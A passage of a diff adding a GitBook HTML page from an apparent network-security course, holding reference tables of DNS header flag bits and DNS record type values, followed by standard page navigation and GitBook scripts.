1528
+ <thead>
1529
+ <tr>
1530
+ <th style="text-align:center">Bit</th>
1531
+ <th>Flag</th>
1532
+ <th>Description</th>
1533
+ <th>Reference</th>
1534
+ </tr>
1535
+ </thead>
1536
+ <tbody>
1537
+ <tr>
1538
+ <td style="text-align:center">bit 5</td>
1539
+ <td>AA</td>
1540
+ <td>Authoritative Answer</td>
1541
+ <td>[RFC1035]</td>
1542
+ </tr>
1543
+ <tr>
1544
+ <td style="text-align:center">bit 6</td>
1545
+ <td>TC</td>
1546
+ <td>Truncated Response</td>
1547
+ <td>[RFC1035]</td>
1548
+ </tr>
1549
+ <tr>
1550
+ <td style="text-align:center">bit 7</td>
1551
+ <td>RD</td>
1552
+ <td>Recursion Desired</td>
1553
+ <td>[RFC1035]</td>
1554
+ </tr>
1555
+ <tr>
1556
+ <td style="text-align:center">bit 8</td>
1557
+ <td>RA</td>
1558
+ <td>Recursion Allowed</td>
1559
+ <td>[RFC1035]</td>
1560
+ </tr>
1561
+ <tr>
1562
+ <td style="text-align:center">bit 9</td>
1563
+ <td></td>
1564
+ <td>Reserved</td>
1565
+ <td></td>
1566
+ </tr>
1567
+ <tr>
1568
+ <td style="text-align:center">bit 10</td>
1569
+ <td>AD</td>
1570
+ <td>Authentic Data</td>
1571
+ <td>[RFC4035]</td>
1572
+ </tr>
1573
+ <tr>
1574
+ <td style="text-align:center">bit 11</td>
1575
+ <td>CD</td>
1576
+ <td>Checking Disabled</td>
1577
+ <td>[RFC4035]</td>
1578
+ </tr>
1579
+ </tbody>
1580
+ </table>
1581
+ <blockquote id="fn_4">
1582
+ <sup>4</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4" target="_blank">DNS Lookups Types</a><a href="#reffn_4" title="Jump back to footnote [4] in the text."> &#x21A9;</a>
1583
+ </blockquote>
1584
+ <table>
1585
+ <thead>
1586
+ <tr>
1587
+ <th style="text-align:center">Type</th>
1588
+ <th style="text-align:center">Value</th>
1589
+ <th style="text-align:center">Description</th>
1590
+ </tr>
1591
+ </thead>
1592
+ <tbody>
1593
+ <tr>
1594
+ <td style="text-align:center">A</td>
1595
+ <td style="text-align:center">1</td>
1596
+ <td style="text-align:center">IP Address</td>
1597
+ </tr>
1598
+ <tr>
1599
+ <td style="text-align:center">NS</td>
1600
+ <td style="text-align:center">2</td>
1601
+ <td style="text-align:center">Name Server</td>
1602
+ </tr>
1603
+ <tr>
1604
+ <td style="text-align:center">CNAME</td>
1605
+ <td style="text-align:center">5</td>
1606
+ <td style="text-align:center">Alias of a domain name</td>
1607
+ </tr>
1608
+ <tr>
1609
+ <td style="text-align:center">PTR</td>
1610
+ <td style="text-align:center">12</td>
1611
+ <td style="text-align:center">Reverse DNS Lookup using the IP Address</td>
1612
+ </tr>
1613
+ <tr>
1614
+ <td style="text-align:center">HINFO</td>
1615
+ <td style="text-align:center">13</td>
1616
+ <td style="text-align:center">Host Information</td>
1617
+ </tr>
1618
+ <tr>
1619
+ <td style="text-align:center">MX</td>
1620
+ <td style="text-align:center">15</td>
1621
+ <td style="text-align:center">MX Record</td>
1622
+ </tr>
1623
+ <tr>
1624
+ <td style="text-align:center">AXFR</td>
1625
+ <td style="text-align:center">252</td>
1626
+ <td style="text-align:center">Request for Zone Transfer</td>
1627
+ </tr>
1628
+ <tr>
1629
+ <td style="text-align:center">ANY</td>
1630
+ <td style="text-align:center">255</td>
1631
+ <td style="text-align:center">Request for All Records</td>
1632
+ </tr>
1633
+ </tbody>
1634
+ </table>
1635
+
1636
+
1637
+ </section>
1638
+
1639
+
1640
+ </div>
1641
+ </div>
1642
+ </div>
1643
+
1644
+
1645
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html" class="navigation navigation-prev " aria-label="Previous page: ARP Spoofing"><i class="fa fa-angle-left"></i></a>
1646
+
1647
+
1648
+ <a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-next " aria-label="Next page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-right"></i></a>
1649
+
1650
+ </div>
1651
+ </div>
1652
+
1653
+
1654
+ <script src="../gitbook/app.js"></script>
1655
+
1656
+
1657
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1658
+
1659
+
1660
+
1661
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1662
+
1663
+
1664
+
1665
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1666
+
1667
+
1668
+
1669
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1670
+
1671
+
1672
+
1673
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1674
+
1675
+
1676
+
1677
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1678
+
1679
+
1680
+
1681
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1682
+
1683
+
1684
+ <script>
1685
+ require(["gitbook"], function(gitbook) {
1686
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1687
+ gitbook.start(config);
1688
+ });
1689
+ </script>
1690
+
1691
+
1692
+ </body>
1693
+
1694
+ </html>